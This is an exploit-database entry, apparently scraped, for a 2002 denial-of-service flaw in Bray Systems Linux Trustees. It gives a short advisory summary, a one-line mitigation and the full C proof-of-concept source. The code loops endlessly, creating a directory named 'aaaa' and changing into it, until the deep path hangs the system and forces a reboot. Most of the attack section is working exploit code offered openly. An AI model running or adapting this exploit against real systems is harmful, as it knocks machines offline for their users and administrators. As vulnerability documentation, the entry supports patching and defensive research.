header-logo
Suggest Exploit
vendor:
Linux Trustees
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Linux Trustees
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Bray Systems Linux Trustees Hangs on Long Paths

Bray Systems Linux Trustees is an access control program which manages user permissions similar to implementations of Netware. Requesting an unusually long file or directory path will cause the application to hang. Other processes may also be affected. In order to regain normal functionality, the user must reboot the machine. The exploit code creates a loop that creates a directory named 'aaaa' and then changes the current directory to 'aaaa'. This causes the application to hang.

Mitigation:

Limit the length of file and directory paths.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/1096/info

Bray Systems Linux Trustees is an access control program which manages user permissions similar to implementations of Netware. Requesting an unusually long file or directory path will cause the application to hang. Other processes may also be affected. In order to regain normal functionality, the user must reboot the machine.

#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{

while(1) {
	if(mkdir("aaaa",0777)<0) {
		perror("mkdir");
		exit(1);
		}
	if(chdir("aaaa")<0) {
		perror("chdir");
		exit(1);
		}
	}

return(0);
}

Navigation

Suggest Exploit

Services By CQR